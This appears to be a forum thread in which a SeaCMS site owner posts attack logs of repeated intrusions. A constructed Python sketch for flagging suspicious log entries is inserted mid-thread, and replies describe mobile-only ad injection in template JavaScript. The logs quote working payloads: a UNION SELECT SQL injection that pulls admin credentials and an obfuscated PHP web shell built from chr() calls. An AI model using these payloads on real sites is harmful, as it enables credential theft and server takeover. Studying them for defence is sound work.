Found that my SeaCMS (海洋CMS) site keeps getting malicious code planted in it

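Original poster
Posted: 2021-12-12 16:27
My SeaCMS site keeps getting hit by SQL injection. PHP files are all being generated under the data folder. The injected code is as follows: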



113.128.35.216||/comment/api/index.php?gid=1&page=2&rlist[]=*hex/$d=chr(65).chr(83).chr(115).chr(101).chr(114).chr(116);@$d($_POST[_]);?%3E||SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=1 AND id in (*hex/$d=chr(65).chr(83).chr(115).chr(101).chr(114).chr(116);@$d($_POST[_]);?>) AND ischeck=1 ORDER BY id DESC limit 10||unusual character
107.148.224.118||//comment/api/index.php?gid=22&page=9&type=3&rlist[]=1)//**@%60'%60**@//UNION%20SELECT%23%0aname,password,null,null,null,null,null,null,null,null,null%23%0afrom%23%0asea_admin--%20@%60'%60||SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=3 AND id in (1)//**@`\'`**@//UNION SELECT#
name,password,null,null,null,null,null,null,null,null,null#
from#
sea_admin-- @`\'`) AND ischeck=1 ORDER BY id DESC limit 10||comment detect
198.144.159.130||//comment/api/index.php?gid=22&page=9&type=3&rlist[]=1)//**@%60'%60**@//UNION%20SELECT%23%0aname,password,null,null,null,null,null,null,null,null,null%23%0afrom%23%0asea_admin--%20@%60'%60||SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=3 AND id in (1)//**@`\'`**@//UNION SELECT#
name,password,null,null,null,null,null,null,null,null,null#
from#
sea_admin-- @`\'`) AND ischeck=1 ORDER BY id DESC limit 10||comment detect
198.144.159.130||/comment/api/index.php?gid=22&page=9&type=3&rlist[]=1)//**@%60'%60**@//UNION%20SELECT%23%0aname,password,null,null,null,null,null,null,null,null,null%23%0afrom%23%0asea_admin--%20@%60'%60||SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=3 AND id in (1)//**@`\'`**@//UNION SELECT#
name,password,null,null,null,null,null,null,null,null,null#
from#
sea_admin-- @`\'`) AND ischeck=1 ORDER BY id DESC limit 10||comment detect
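
A triage sketch for log entries in the `ip||request||sql||reason` layout quoted above. It is an added example, not part of the original post and not SeaCMS code. It assumes that `rlist[]` is meant to carry integer comment ids (inferred from the `id in (...)` clause in the logged query), and the sample records and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample in the "ip||request||sql||reason" layout of the log above.
# IPs are documentation-range placeholders. The second record spans several
# lines because the request carried encoded newlines (%0a).
SAMPLE_LOG = """\
203.0.113.10||/comment/api/index.php?gid=1&page=2&rlist[]=15&rlist[]=16||SELECT id FROM sea_comment WHERE id in (15,16)||constructed
203.0.113.20||//comment/api/index.php?gid=22&type=3&rlist[]=1)%20UNION%20SELECT%23%0aname,password%23%0afrom%23%0asea_admin||SELECT id FROM sea_comment WHERE id in (1) UNION SELECT#
name,password#
from#
sea_admin) AND ischeck=1||comment detect
"""

RECORD_START = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}\|\|")

def parse_records(text):
    """Group physical lines into records; a record starts with 'IPv4||'."""
    chunks = []
    for line in text.splitlines():
        if RECORD_START.match(line) or not chunks:
            chunks.append(line)
        else:
            chunks[-1] += "\n" + line  # continuation of a multi-line query
    records = []
    for chunk in chunks:
        parts = chunk.split("||")
        if len(parts) < 4:
            continue  # truncated or unrelated line
        records.append({"ip": parts[0], "request": parts[1],
                        "sql": "||".join(parts[2:-1]), "reason": parts[-1]})
    return records

def bad_rlist_values(request):
    """Return the rlist[] values of a request that are not plain integers
    (assumption: rlist[] should only ever hold numeric comment ids)."""
    query = request.partition("?")[2]
    return [v for k, v in parse_qsl(query, keep_blank_values=True)
            if k == "rlist[]" and not re.fullmatch(r"[0-9]+", v)]

def suspicious_sources(text):
    """Map source IP -> non-numeric rlist[] values it sent."""
    hits = {}
    for rec in parse_records(text):
        bad = bad_rlist_values(rec["request"])
        if bad:
            hits.setdefault(rec["ip"], []).extend(bad)
    return hits
```

Grouping by source address gives a starting list for correlating these requests with the creation times of the unexpected PHP files under the data folder.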
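Reply #1
Posted: 2021-12-15 22:08
My site is new. It hadn't even had a domain bound yet, and right after going live it had ads planted in it. They're all in the template's JS.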
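Reply #2
Posted: 2021-12-21 14:05
aqws: Which JS file is yours planted in? Mine is also showing pop-up ads for live streams, only on mobile. The JS files' modification times haven't changed recently either, so how do I find out where it's planted?
Mine also only pops up ads on mobile. Look carefully at the JS files; that code is all encrypted.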